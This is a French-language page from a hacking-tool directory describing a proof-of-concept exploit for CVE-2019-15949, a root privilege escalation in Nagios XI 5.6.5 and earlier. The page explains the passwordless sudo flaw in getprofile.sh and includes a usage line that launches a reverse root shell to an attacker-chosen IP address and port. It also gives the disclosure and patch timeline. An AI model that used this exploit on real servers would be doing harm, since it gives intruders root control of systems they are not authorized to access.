Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
nagiosxi-root-rce-exploit — POC qui exploite une vulnérabilité dans Nagios XI (5.6.5) pour lancer un shell root. | Kitploit
Outils/GitHubGitHub/jakgibb/nagiosxi-root-rce-exploit
Escalade de PrivilègesExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubjakgibb/nagiosxi-root-rce-exploit

nagiosxi-root-rce-exploit

POC qui exploite une vulnérabilité dans Nagios XI (5.6.5) pour lancer un shell root.

Voir le dépôt
167il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

nagiosxi-root-exploit

Aperçu

Une vulnérabilité existe dans Nagios XI <= 5.6.5 permettant à un attaquant d'exploiter une RCE pour élever ses privilèges à root.
L'exploitation nécessite un accès au serveur en tant qu'utilisateur 'nagios', ou un accès CCM via l'interface web avec des autorisations pour gérer les plugins.

Détails

Le script getprofile.sh, invoqué en téléchargeant un profil système (profile.php?cmd=download), est exécuté en tant que root via une entrée sudo sans mot de passe ; le script exécute l'exécutable 'check_plugin' qui appartient à l'utilisateur nagios.
Un utilisateur connecté à Nagios XI avec des autorisations pour modifier les plugins, ou l'utilisateur 'nagios' sur le serveur, peut modifier l'exécutable 'check_plugin' et insérer des commandes malveillantes exécutables en tant que root.

POC

Un POC en PHP a été développé, qui téléverse une charge utile résultant en un shell root inversé.
Utilisation :
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port

Divulgation

Signalé à Nagios le : 29 juillet 2019
Confirmé par Nagios le : 29 juillet 2019
Corrigé dans la version : 5.6.6 le : 20 août 2019
CVE attribué le : 6 septembre 2019 (CVE-2019-15949 https://nvd.nist.gov/vuln/detail/CVE-2019-15949)

alt text

Télécharger l’outil